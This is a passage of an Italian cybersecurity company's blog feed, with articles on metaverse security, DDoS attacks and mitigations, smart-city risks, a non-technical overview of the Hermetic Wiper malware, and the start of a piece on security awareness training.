&lt;li&gt;&lt;strong&gt;Settore fashion ed e-commerce&lt;/strong&gt;: l’utilizzo di questi strumenti può permettere a clienti dall’altra parte del mondo di navigare e fare acquisti in versione digitale, come se fossero effettivamente nel negozio. È il caso di Burberry che ha collaborato con Elle Digital in Giappone per ricreare una versione virtuale del negozio situato a Ginza, con l’obiettivo di superare i limiti fisici e creare una nuova esperienza digitale accessibile a tutti. I clienti da tutto il mondo hanno avuto la possibilità di “entrare” nel negozio e fare acquisti comodamente da casa.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questi sono solo alcuni degli esempi dei settori maggiormente coinvolti nel metaverso nell’attuale momento storico.&lt;/p&gt;

&lt;h2 id=&#34;metaverso-e-sicurezza-informatica&#34;&gt;Metaverso e sicurezza informatica&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Nel metaverso, così come nel mondo fisico, bisogna però confrontarsi con un problema sempre più comune: la sicurezza informatica&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Furti di identità (o di avatar) o deepfake, ossia figure digitali manipolate per sembrare qualcun altro, sono solo alcuni dei problemi che potranno riscontrarsi.&lt;/p&gt;

&lt;p&gt;A livello aziendale, in questo universo parallelo sarà quindi fondamentale essere in grado di proteggere il proprio perimetro e garantire un adeguato livello di controllo degli accessi, considerato come la prima forma di difesa dai pericoli di questa nuova dimensione digitale.&lt;/p&gt;

&lt;p&gt;Il metaverso poi si presta anche per quella &lt;strong&gt;categoria di attacchi anche nota come Man in the Room&lt;/strong&gt;, ossia l’evoluzione di Man in the Middle. Questo tipo di attacco consiste nella creazione di avatar malevoli che si inseriscono in conversazioni e riunioni virtuali con il fine ultimo di esfiltrare informazioni personali; in questo caso il problema riguarda anche il futuro utilizzo di questi dati per attacchi ben più complessi e sofisticati.&lt;/p&gt;

&lt;p&gt;Inoltre, &lt;strong&gt;è il terreno perfetto per la creazione di future campagne phishing che potrebbero raggiungere livelli mai visti prima&lt;/strong&gt;: il coinvolgimento e l’aumento dell’interattività tra partecipanti può far diminuire il livello di guardia degli utenti, permettendo così ai cyber criminali di operare indisturbati.&lt;/p&gt;

&lt;p&gt;Considerato questo aspetto, per le aziende &lt;strong&gt;sarà fondamentale abbracciare un approccio umano-centrico&lt;/strong&gt;, insistendo su temi quali l’alfabetizzazione digitale e la pianificazione di &lt;a href=&#34;https://blog.cybergon.com/posts/cyber-security-awareness-quando-il-fattore-umano-puo-ridurre-il-rischio-di-un-attacco-informatico/&#34;&gt;corsi di awareness&lt;/a&gt;, cioè formazione dei propri dipendenti per insegnare loro a riconoscere gli elementi comuni delle campagne phishing e truffe, valutando ogni caso in maniera critica ed indipendente. La prevenzione risulta essere il modo migliore per le persone e le organizzazioni di rimanere al sicuro, in generale su internet ed in particolar modo nel metaverso.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Last but not least, il ransomware&lt;/strong&gt;: minaccia informatica responsabile di perdite per decine di milioni di euro in tutto il mondo.
Per questo, così come nel mondo reale, anche in quello del metaverso sarà fondamentale applicare protocolli di sicurezza ad hoc in modo da instaurare una relazione di fiducia da parte degli utenti nell’utilizzo del metaverso.&lt;/p&gt;

&lt;p&gt;Monitorare la propria azienda e i relativi sistemi permetterà di rilevare ogni tentativo di accesso o infezione in tempo reale. Vi sono alcuni tool che possono essere utilizzati dalle aziende per riconoscere eventuali anomalie tra gli accessi dei dipendenti, uno di questi è l’&lt;strong&gt;Active Directory Audit (AD Audit): una soluzione per il controllo delle password delle diverse utenze dei propri dipendenti, in un unico repository&lt;/strong&gt;.
Il cliente avrà così tutte le informazioni vitali sulle risorse della rete e la visibilità su quelle maggiormente critiche, così da poter controllare e, in caso di necessità, agire tempestivamente sulle utenze più a rischio.&lt;/p&gt;

&lt;p&gt;A fronte di questi riscontri vengono consigliate poi alcune azioni di remediation o mitigation, come il cambio di policy di dominio o la revisione dei permessi.&lt;/p&gt;

&lt;p&gt;Infine, considerando come le tecnologie siano in continua evoluzione, per far si che la propria azienda sia al sicuro &lt;strong&gt;bisognerà investire in sicurezza informatica e in tutte quelle nuove tecnologie e nuovi strumenti che permettono una protezione da attacchi informatici di ogni genere&lt;/strong&gt;.
&lt;strong&gt;La sicurezza fai da te non è più contemplata&lt;/strong&gt;, diventerà quindi fondamentale affidarsi ad esperti del settore.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cosa sono gli attacchi DDoS e come proteggersi</title>
         <link>https://blog.cybergon.com/posts/cosa-sono-gli-attacchi-ddos-e-come-proteggersi/</link>
         <pubDate>Mon, 06 Jun 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Fabio Gallo</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cosa-sono-gli-attacchi-ddos-e-come-proteggersi/</guid>
         <description>

&lt;p&gt;Il 20 maggio in Italia alcuni siti istituzionali quali quello del ministero dell’ambiente, del ministero degli esteri e del consiglio superiore di magistratura sono andati offline; dopo un’attenta analisi si è compreso che il down era dovuto ad attacchi DDoS.&lt;/p&gt;

&lt;p&gt;Quindi, scopriamo cosa sono, come funzionano e come possiamo proteggerci.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-ddos/attacchi-ddos-copertina.png&#34; alt=&#34;Attacchi DDoS&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DDoS è l’acronimo di Distributed Denial of Service, ovvero interruzione distribuita del servizio&lt;/strong&gt;, ed è un tipo di attacco informatico in cui &lt;strong&gt;l’aggressore cerca di impedire agli utenti di accedere alle risorse presenti su una rete o sui computer&lt;/strong&gt;. L’attacco è un’evoluzione del DoS (Denial of Service): quando parliamo di “distribuito”, infatti, ci riferiamo al fatto che questi attacchi provengono da più luoghi o più dispositivi contemporaneamente, al contrario di un attacco DoS che prevede una singola entità.&lt;/p&gt;

&lt;p&gt;I DDoS, che sono aumentati negli ultimi anni in termini di numeri registrati, hanno come scopo principale la disruption del servizio; ultimamente, però, l’attacco può essere collegato anche al successivo esfiltraggio di dati. &lt;strong&gt;I criminali informatici cercano di far cadere il sito colpito e farlo diventare vulnerabile tramite l’invio di un elevato numero di richieste&lt;/strong&gt;; alcune volte queste vulnerabilità vengono sfruttate per hackerare il sito ma, nella maggior parte dei casi, l’obiettivo primario è quello di impedirne il corretto funzionamento.&lt;/p&gt;

&lt;p&gt;Un evento DDoS che registrò un impatto significativo fu &lt;strong&gt;l’attacco del 2013 conosciuto come “Spamhaus” che colpì l’omonima azienda&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Spamhaus è un’organizzazione internazionale che offre soluzioni e strumenti antispam, cioè compila gli elenchi dei filtri per bloccare i mittenti delle mail spam. Questo evento, che è rimasto nella cronaca perché è stato il primo ad aver portato alla luce gli effetti che possono avere gli attacchi DDoS, ha portato a rallentare la velocità del traffico web globale, sfruttando connessioni per un traffico totale superiore ai 300 gigabit al secondo, coinvolgendo diversi nodi dell’infrastruttura di Internet e mettendo a dura prova non solo i server di Spamhaus, ma anche diversi siti istituzionali, inclusi banche e altri siti.&lt;/p&gt;

&lt;h2 id=&#34;tipi-di-attacco&#34;&gt;Tipi di attacco&lt;/h2&gt;

&lt;p&gt;Vi è un’eterogeneità di &lt;strong&gt;attacchi DDoS che possono essere raggruppati in 3 macrocategorie&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Volumetrici&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sono gli attacchi maggiormente diffusi.
L’intento è quello di &lt;strong&gt;rendere i server o le infrastrutture irraggiungibili, inondandoli di una quantità elevata di richieste&lt;/strong&gt;, impedendo agli utenti legittimi di accedere a un’applicazione o servizio e arrestando il flusso in entrata o in uscita del traffico. La connessione di rete o le risorse risulteranno sature e non saranno più in grado di gestire il flusso di traffico né di rispondere alle richieste.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-ddos/attacchi-ddos-1.PNG&#34; alt=&#34;Attacchi DDoS Volumetrici&#34; /&gt;
Fonte: Cloudflare&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ai protocolli&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gli attacchi ai protocolli, anche noti come “state-exhaustion attacks”, &lt;strong&gt;tentano di consumare ed esaurire la capacità di elaborazione di varie risorse dell&amp;rsquo;infrastruttura di una rete&lt;/strong&gt;, come server o firewall, attraverso richieste di connessione dannose che sfruttano vulnerabilità dei protocolli di rete.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-ddos/attacchi-ddos-2.PNG&#34; alt=&#34;Attacchi DDoS ai Protocolli&#34; /&gt;
Fonte: Cloudflare&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A livello di applicazione o Layer 7&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Quest’ultima categoria di attacchi ha &lt;strong&gt;l’obiettivo di creare una congestione consumando tutta la larghezza di banda disponibile tra l’obiettivo che espone un applicativo e la rete internet&lt;/strong&gt;. Grandi quantità di dati vengono inviate ad un soggetto utilizzando una forma di amplificazione o un altro mezzo per creare traffico massiccio.
Per far sì che un attacco simile vada a buon fine vengono richieste quantità di risorse minime alla macchina target, così da poter passare inosservate ai firewall e sistemi di protezione generali.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacchi-ddos/attacchi-ddos-3.png&#34; alt=&#34;Attacchi DDoS Layer 7&#34; /&gt;
Fonte: Cloudflare&lt;/p&gt;

&lt;p&gt;Nella pratica, poi, ognuna di queste categorie di attacco può avere diversi metodi di applicazione.&lt;/p&gt;

&lt;h2 id=&#34;quali-sono-le-best-practice-da-mettere-in-pratica-per-contrastare-questo-genere-di-attacco&#34;&gt;Quali sono le best practice da mettere in pratica per contrastare questo genere di attacco?&lt;/h2&gt;

&lt;p&gt;In primis, consigliamo di visionare &lt;a href=&#34;https://www.csirt.gov.it/contenuti/attacchi-ddos-ai-danni-di-soggetti-nazionali-ed-internazionali-avvenuti-a-partire-dall11-maggio-2022-analisi-e-mitigazione-bl01-220513-csirt-ita&#34;&gt;il sito del CSIRT&lt;/a&gt; (Computer Security Incident Response Team) in cui vengono spiegate le azioni di mitigazione da mettere in atto.&lt;/p&gt;

&lt;p&gt;In particolare:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;rifiutare le connessioni con metodi HTTP non supportati dall’URL;&lt;/li&gt;
&lt;li&gt;limitare l’intestazione e il corpo del messaggio a una lunghezza minima ragionevole. Per URL specifici, impostare limiti più severi e appropriati per ogni risorsa che accetta un body del messaggio;&lt;/li&gt;
&lt;li&gt;impostare un timeout di connessione assoluto, ove possibile, utilizzando le statistiche di connessione (ad es. un timeout leggermente maggiore della durata media delle connessioni dovrebbe soddisfare la maggior parte dei client legittimi);&lt;/li&gt;
&lt;li&gt;utilizzare un backlog di connessioni in sospeso. Esso consente al server di mantenere le connessioni che non è pronto ad accettare, bloccando di conseguenza un attacco Slow HTTP più ampio, oltre a dare agli utenti legittimi la possibilità di essere serviti sotto carico elevato. Se il server supporta un backlog, si consiglia di renderlo ragionevolmente grande in modo che il proprio server web possa gestire un attacco di lieve entità;&lt;/li&gt;
&lt;li&gt;definire la velocità minima dei dati in entrata e bloccare le connessioni che sono più lente della velocità impostata. Si evidenzia di fare attenzione a non impostare il valore minimo troppo basso per non bloccare le connessioni legittime;&lt;/li&gt;
&lt;li&gt;attivare gli strumenti di protezione da questa tipologia di attacco disponibili tramite dispositivi di sicurezza quali Web Application Firewall e Next Generation Firewall L7.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questo bollettino è stato elaborato dal nucleo per la sicurezza informatica in seguito ai recenti attacchi.&lt;/p&gt;

&lt;p&gt;Considerando la costante evoluzione degli attacchi informatici, una protezione contro gli attacchi DDoS che adotti un approccio di difesa approfondita può tenere al sicuro l’utente finale. Un servizio di mitigazione degli attacchi DDoS individuerà e bloccherà gli attacchi nel momento in cui viene rilevato del traffico dannoso.&lt;/p&gt;

&lt;p&gt;I provider di mitigazione degli attacchi DDoS filtrano questo traffico per evitare che venga raggiunto l’oggetto dell’attacco.&lt;/p&gt;

&lt;p&gt;Quello che ci sentiamo di consigliare è di affidarsi ad un team di esperti nel caso in cui ci sia il timore di essere o di essere stati vittima di un attacco simile.&lt;/p&gt;

&lt;h2 id=&#34;impatto-di-un-attacco-ddos-sul-business&#34;&gt;Impatto di un attacco DDoS sul business&lt;/h2&gt;

&lt;p&gt;Se il business di un’azienda si basasse anche sul funzionamento del sito sotto attacco, il suo non-funzionamento potrebbe impattare negativamente il business stesso. &lt;strong&gt;Nel 2018 gli attacchi DDoS sono aumentati del 40% nelle grandi organizzazioni con una media di 8 attacchi al giorno&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Ci sono diversi modi in cui un attacco DDoS può impattare sul business.&lt;/p&gt;

&lt;p&gt;La prima riguarda la parte finanziaria: secondo un recente report di Gartner, &lt;strong&gt;il costo medio dei tempi di inattività della rete è di circa 5.600 dollari al minuto cioè circa 300.000 dollari all&amp;rsquo;ora&lt;/strong&gt;.
Inoltre, in media, &lt;strong&gt;nel 2019 il costo di un attacco DDoS per le imprese è arrivato a costare anche 2 milioni di dollari&lt;/strong&gt;, mentre per le piccole e medie imprese (PMI) 120.000 dollari.&lt;/p&gt;

&lt;p&gt;I trend della sicurezza informatica negli ultimi anni sono in costante aumento, per questo i dati a cui facciamo riferimento sono una stima al ribasso e continueranno a crescere in maniera consistente.&lt;/p&gt;

&lt;p&gt;Per mitigare gli attacchi DDoS il 45% delle aziende impiega da 3 a più di 24 ore, si tratta quindi di perdite finanziarie significative.&lt;/p&gt;

&lt;p&gt;Inoltre, le interruzioni delle sessioni di navigazione possono anche portare ad una perdita relativa alla reputazione del brand e alla fiducia dei clienti, con danni inquantificabili.&lt;/p&gt;

&lt;p&gt;Questo genere di attacchi, come ultimamente constatato, viene utilizzato maggiormente per questioni ideologiche: gli hacktivisti, cyber criminali che sono mossi non tanto da motivi economici ma piuttosto da ragioni politico-sociali, infatti, tendono a prendere di mira determinati siti con cui non si trovano in accordo per motivi ideologici e/o politici.&lt;/p&gt;

&lt;p&gt;Diventa dunque fondamentale adottare le misure preventive e le precauzioni adatte per evitare disservizi consistenti.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Smart City: la città interconnessa deve anche essere cyber sicura</title>
         <link>https://blog.cybergon.com/posts/smart-city-la-citta-interconessa-deve-anche-essere-cyber-sicura/</link>
         <pubDate>Mon, 16 May 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/smart-city-la-citta-interconessa-deve-anche-essere-cyber-sicura/</guid>
         <description>

&lt;p&gt;&lt;strong&gt;Circa 3.5 miliardi di persone vivono nelle città, numero destinato ad aumentare e raggiungere i 5 miliardi entro la fine del 2030&lt;/strong&gt; passando, secondo una ricerca delle Nazioni Unite, dall’attuale 55% a circa il 70%.
Questo costante aumento dovrà necessariamente confrontarsi con &lt;strong&gt;la creazione o l’evoluzione di città in grado di supportare il cambiamento, sia a livello di infrastrutture che di servizi offerti ai cittadini&lt;/strong&gt;. Lo sviluppo tecnologico è il punto di partenza per rispondere a questa sfida.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;La società in cui viviamo è ormai proiettata all’utilizzo di nuove tecnologie sempre più sofisticate&lt;/strong&gt;. La velocità di adozione di queste ultime avrà un ruolo fondamentale per lo &lt;strong&gt;sviluppo di città sempre più interconnesse: le Smart City&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/smartcity/smartcity-copertina.jpg&#34; alt=&#34;Smart_City_CybergON&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;lo-sviluppo-delle-smart-city&#34;&gt;Lo sviluppo delle Smart City&lt;/h2&gt;

&lt;p&gt;Quando parliamo di &lt;strong&gt;Smart City ci riferiamo a tutte quelle soluzioni&lt;/strong&gt; come la smart mobility, la gestione di fornitura di energia o lo smaltimento dei rifiuti che vengono gestite tramite l’utilizzo di tecnologie smart che sono &lt;strong&gt;finalizzate a semplificare la vita del cittadino, migliorare il benessere dello stesso, offrire nuovi servizi a costi minori e rendere più efficienti quelli offerti&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il vero problema in questo contesto riguarda l’utilizzo dei dati dei cittadini&lt;/strong&gt;: per creare delle città intelligenti il primo passo è la raccolta di grandi quantità di dati per l’analisi e la successiva creazione di soluzioni mirate. La gestione di Big Data, però, comporta anche dei rischi per la sicurezza e la salvaguardia di questi dati.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Le smart city rappresentano un campo di prova per la convivenza di due trend ormai imprescindibili&lt;/strong&gt;: da un lato &lt;strong&gt;la digitalizzazione&lt;/strong&gt;, dall’altro invece &lt;strong&gt;la protezione delle infrastrutture&lt;/strong&gt; per mantenere al sicuro i dati sensibili che nascono dall’utilizzo di questi dispositivi. Proprio su questi temi &lt;strong&gt;la Cyber Security gioca un ruolo fondamentale&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;L’attenzione verso i dati prodotti nel contesto delle smart cities è provata da &lt;strong&gt;diversi attacchi informatici avvenuti nell’ultimo decennio contro alcune città americane&lt;/strong&gt;.
Di seguito si riportano quelli più noti:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Atlanta, 2016: la città rimane bloccata per circa 5 giorni dopo l’interruzione dei sistemi informatici della corte di giustizia, dell’amministrazione comunale e dei centri per l’impiego.&lt;/li&gt;
&lt;li&gt;Baltimore, 2019: per via di un attacco cyber vengono bloccati i sistemi di posta elettronica ed altri servizi rivolti ai cittadini. La piena operatività riprende solo dopo alcuni mesi.&lt;/li&gt;
&lt;li&gt;San Francisco, 2016: la metro, successivamente ad un attacco ransomware, viene bloccata creando problemi alla circolazione sotterranea.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;il-mondo-delle-smart-car&#34;&gt;Il mondo delle Smart Car&lt;/h2&gt;

&lt;p&gt;Altra categoria riguarda &lt;strong&gt;il mondo delle Smart Car&lt;/strong&gt;: anche i veicoli di ultima generazione sono sempre più interconnessi, basti pensare ai diversi servizi gestibili da remoto tramite app per smartphone. Questo tipo di connessione porta ad innumerevoli benefici, tuttavia può portare a rischi concreti in termini di sicurezza.
&lt;strong&gt;Il mercato delle “auto intelligenti” è in costante aumento&lt;/strong&gt;, tanto che nel periodo 2015-2022 è stato previsto un aumento del 33% per un valore totale di 153.60 miliardi di dollari.&lt;/p&gt;

&lt;p&gt;Nel 2015, per sottolineare la facilità con cui una macchina potesse essere sbloccata, era stato fatto un esperimento, organizzato da un adolescente di 15 anni: il risultato? Auto sbloccata e alcune azioni avviate da remoto come i tergicristalli, il clacson ed i fari.
L’esperimento aveva l’obiettivo di sottolineare come non vi fossero barriere d’ingresso legate alla sicurezza, elencando le diverse vulnerabilità e criticità intorno al mondo delle Smart Car.
Questo iniziale esperimento ha aperto un mondo di ulteriori test, effettuati da diversi importanti brand, con l’obiettivo di rendere sempre più “sicuro” questo campo.&lt;/p&gt;

&lt;p&gt;Inoltre, secondo quanto riportato dal Global Automotive Consumer Study 2021, in Italia, il 74% degli utenti sarebbe favorevole all’uso di veicoli sempre più interconnessi, contro il 44-46% di Stati Uniti e Francia e solo il 33% di Germania.
Secondo l’Osservatorio Smart&amp;amp;Connected Car della School of Management del Politecnico di Milano, l’87% delle pubbliche amministrazioni considera la Smart Mobility di grande importanza affinché si sviluppino le Smart City.
Questa trasformazione nel settore automotive è il primo passo per una città sempre più interconnessa, che però pone in primo piano il problema della Cybersecurity.&lt;/p&gt;

&lt;h2 id=&#34;la-protezione-dei-dati-nelle-città-interconnesse&#34;&gt;La protezione dei dati nelle città interconnesse&lt;/h2&gt;

&lt;p&gt;Tornando alle Smart City, &lt;strong&gt;i punti di criticità riguardano la configurazione e la necessità che tutti i servizi siano tra di loro sempre collegati&lt;/strong&gt;. &lt;strong&gt;Ogni punto di “connessione” è di fatto un possibile anello debole della struttura&lt;/strong&gt;, poiché permetterebbe ai cyber criminali un facile accesso all’infrastruttura.&lt;/p&gt;

&lt;p&gt;Nei prossimi anni le Smart City potrebbero diventare oggetto di interesse per i criminali informatici, per questo motivo è fondamentale mettere in campo diverse risorse per evitare che dati sensibili finiscano nelle mani sbagliate.
In Italia, per esempio, secondo un report di Statista, per rendere le città sempre più smart ci sono alcuni progetti che si stanno portando avanti; come riportato nel grafico sottostante, il tema più importante riguarda gli investimenti in tema security che negli ultimi anni stanno aumentando.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/smartcity/smartcity-1.png&#34; alt=&#34;Interest_in_smart_city_projects_in_Italy&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Come riportato nel grafico sotto, &lt;strong&gt;l’analisi di Statista mostra quali sono i servizi a rischio di attacchi informatici&lt;/strong&gt;. La top 3 riguarda le reti Wi-Fi pubbliche, le smart grid, cioè le reti di informazioni e di distribuzione dell&amp;rsquo;energia elettrica, ed i trasporti.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/smartcity/smartcity-2.png&#34; alt=&#34;Smart_city_services_at_risk_from_cyberattacks&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Molti dei vettori di attacco odierni sono gli stessi con cui abbiamo avuto a che fare per decenni: le vulnerabilità non patchate, le configurazioni errate e le password compromesse rimangono problemi significativi.&lt;/p&gt;

&lt;p&gt;In questo campo, &lt;strong&gt;il tipo di attacco più diffuso è il Dos&lt;/strong&gt; (Denial of Service) in cui l’aggressore cerca di impedire l’accesso alla rete o al computer degli utenti, inviando un elevato numero di richieste all’infrastruttura con l’obiettivo di renderla inutilizzabile.&lt;/p&gt;

&lt;p&gt;Le più grandi città dovranno quindi investire miliardi di euro nelle proprie infrastrutture e la sfida principale per il mondo della sicurezza informatica sarà quello di mantenere al sicuro queste città. &lt;strong&gt;Nei prossimi due anni si parla di circa 120 miliardi di euro, dei quali il 44% dovrà essere destinato alla protezione dei dati sensibili&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Per proteggere le città sarà quindi fondamentale costruire delle vere e proprie mura tecnologiche in grado di proteggere le informazioni personali e la libertà del singolo individuo.&lt;/p&gt;

&lt;p&gt;Inoltre, insieme al tema di Cyber Security, anche quello delle Smart City è tra i punti di attenzione del PNRR (Piano Nazionale di Ripresa e Resilienza), poiché l’adozione di tecnologie intelligenti può ridurre i consumi e rendere le città più green, valutando e gestendo i rischi relativi alla privacy e alla sicurezza dei dati dei cittadini.&lt;/p&gt;

&lt;p&gt;Infine, vogliamo concludere con una riflessione fatta dal nostro CISO Filadelfio Emanuele: &lt;em&gt;“…ritengo necessario sottolineare nuovamente che il trend delle Smart City è ancora in ombra; tuttavia,&lt;/em&gt; &lt;strong&gt;la prossima tipologia di riscatto potrebbe essere legata ad una limitazione della nostra libertà&lt;/strong&gt;. &lt;em&gt;Pensare che un criminale potrebbe prendere possesso dei sistemi di accesso di un quartiere, di un palazzo, di un ascensore o della nostra porta di casa e bloccarci all’interno richiedendo il pagamento di un vero riscatto”.&lt;/em&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Hermetic Wiper: analisi del malware che ha colpito l&#39;Ucraina</title>
         <link>https://blog.cybergon.com/posts/hermetic_wiper/</link>
         <pubDate>Tue, 26 Apr 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Simone Errico</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/hermetic_wiper/</guid>
         <description>

&lt;p&gt;Durante l’ultimo mese si è spesso sentito parlare di &lt;strong&gt;Hermetic Wiper, il malware utilizzato in azioni contro agenzie governative e banche ucraine&lt;/strong&gt;. Con l’iniziale obiettivo di colpire solo il già citato Paese, si è poi diffuso in occidente, colpendo sempre più stati.&lt;/p&gt;

&lt;p&gt;L’origine del malware sembra essere strettamente connessa al conflitto in corso: infatti, il ransomware di tipo Data Wiper è stato distribuito a partire dal 23 febbraio 2022.
In questo articolo il nostro obiettivo è quello di &lt;strong&gt;analizzare il malware da un punto di vista tecnico&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;come-funziona&#34;&gt;Come funziona&lt;/h2&gt;

&lt;p&gt;Il suo funzionamento è pensato per distruggere i dati del sistema in maniera tale da renderne impossibile il futuro recupero, minando anche il funzionamento del sistema operativo.  L’infezione porterà quindi al blocco completo del PC.&lt;/p&gt;

&lt;p&gt;Hermetic Wiper sfrutta i driver di un software completamente lecito di gestione dei dischi (EaseUS Partition Manager), che sono integrati nel suo codice.
Di seguito &lt;strong&gt;il video per vederlo in azione&lt;/strong&gt;:&lt;/p&gt;

&lt;figure class=&#34;video_container&#34;&gt;
  &lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/Yo5VxORV-B4&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt; &lt;/iframe&gt;
&lt;/figure&gt;

&lt;p&gt;Hermetic Wiper in una prima fase frammenta e poi sovrascrive vari settori di disco con dati casuali, tra cui i settori del Master Boot Record (MBR), responsabili dell’avvio del sistema. La frammentazione rende ancora più difficoltosi eventuali tentativi di recupero dei dati presenti sul disco. Con il procedere della sovrascrittura alcune DLL verranno rese inservibili e con esse smetteranno di funzionare i processi che ne fanno uso. Ad un certo punto questo provocherà un errore non risolvibile in RAM che, a sua volta, causerà il Blue Screen visibile nella parte conclusiva del video. Dopo l’errore è chiaramente visibile un tentativo di riavvio, che però non andrà mai a buon fine, avendo il malware reso inservibili sia il MBR che il sistema operativo.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;È comunque possibile evitare il malware tramite i software antivirus aggiornati&lt;/strong&gt;; basterà dunque una scansione regolare dei file scaricati sul computer per accertarsi che non siano infetti. Sistemi validi di EDR/XDR sono inoltre capaci di identificare e bloccare i comportamenti tipici di questo strumento, anche qualora si venisse infettati da una versione del malware ancora mancante nei database antivirus.&lt;/p&gt;

&lt;p&gt;Il CSIRT italiano, nella pagina ufficiale, riporta quelli che sono &lt;a href=&#34;https://www.csirt.gov.it/contenuti/misure-di-protezione-delle-infrastrutture-digitali-nazionali-dai-possibili-rischi-cyber-derivanti-dalla-situazione-ucraina-bl01-220214-csirt-ita&#34;&gt;i consigli principali&lt;/a&gt; per proteggersi dagli attacchi in questione.&lt;/p&gt;

&lt;h2 id=&#34;in-futuro&#34;&gt;In futuro&lt;/h2&gt;

&lt;p&gt;Secondo gli esperti che per primi hanno individuato il malware, si hanno notizie di Hermetic Wiper già dal 28 dicembre 2021, ma solo successivamente è stato usato per infettare centinaia di computer ucraini il giorno prima dell’attacco militare sferrato dalla Russia.&lt;/p&gt;

&lt;p&gt;Inizialmente si pensava che i possibili impatti collaterali a carico di infrastrutture ICT di enti, organizzazioni e aziende che avessero rapporti con soggetti ucraini potessero pesare significativamente; in realtà, soprattutto per quanto concerne il nostro Paese, non sono ancora stati riscontrati attacchi informatici rilevanti in cui è stato sfruttato questo malware.&lt;/p&gt;

&lt;p&gt;Lo stesso CERT dell’Agenzia per l’Italia Digitale ha rilevato nel nostro Paese 58 campagne malevole durante il periodo considerato, 48 delle quali con obiettivi italiani e 10 generiche che hanno comunque interessato l’Italia. Questo dato rimane in linea con i riepiloghi settimanali precedenti, nonostante i tumulti che stanno avvenendo a livello internazionale.&lt;/p&gt;

&lt;p&gt;Bisognerà comunque &lt;strong&gt;prestare attenzione ai futuri svolgimenti non solo mettendo in atto una serie di misure preventive ed organizzative, ma anche attraverso azioni più concrete&lt;/strong&gt; quali il monitoraggio di account di servizio per rilevare attività anomale, la richiesta di autenticazione a più fattori – in particolare per servizi VPN – e la priorizzazione delle attività di patching.&lt;/p&gt;

&lt;p&gt;Se hai subito un attacco informatico puoi contattarci a &lt;a href=&#34;mailto:sos@cybergon.com&#34;&gt;sos@cybergon.com&lt;/a&gt;, il nostro team di specialisti opera in modalità 24x7.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cyber Security Awareness: quando il fattore umano può ridurre il rischio di un attacco informatico</title>
         <link>https://blog.cybergon.com/posts/cyber-security-awareness-quando-il-fattore-umano-puo-ridurre-il-rischio-di-un-attacco-informatico/</link>
         <pubDate>Mon, 04 Apr 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cyber-security-awareness-quando-il-fattore-umano-puo-ridurre-il-rischio-di-un-attacco-informatico/</guid>
         <description>

&lt;p&gt;&lt;strong&gt;AWARENESS significa consapevolezza, ma qual è la connessione con il mondo della sicurezza informatica?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Molto spesso leggiamo dell’importanza di navigare su internet in modo “sicuro” e che essere consapevoli dei rischi che si corrono in rete è il primo modo per evitare di cadere vittima. Tuttavia rimane difficile riuscire a declinare la consapevolezza all’interno di un percorso che tocchi la vita privata e pubblica degli utenti.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/awareness/awareness-copertina.png&#34; alt=&#34;cyber-security-awareness&#34; /&gt;&lt;/p&gt;

